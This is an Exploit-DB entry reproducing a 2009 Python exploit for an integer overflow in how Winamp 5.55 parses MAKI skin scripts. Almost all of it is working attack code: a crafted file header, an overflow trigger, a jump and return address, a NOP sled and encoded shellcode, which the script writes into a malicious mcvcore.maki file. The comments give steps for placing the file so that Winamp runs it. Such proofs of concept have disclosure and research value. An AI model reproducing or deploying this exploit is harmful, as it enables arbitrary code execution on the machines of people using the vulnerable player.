Winamp 5.55 - MAKI script Universal Integer Overflow

EDB-ID:

8772




Platform:

Windows

Date:

2009-05-22


# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
#      just edit the calculations of the chars
#

header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")

ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")


chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()

# milw0rm.com [2009-05-22]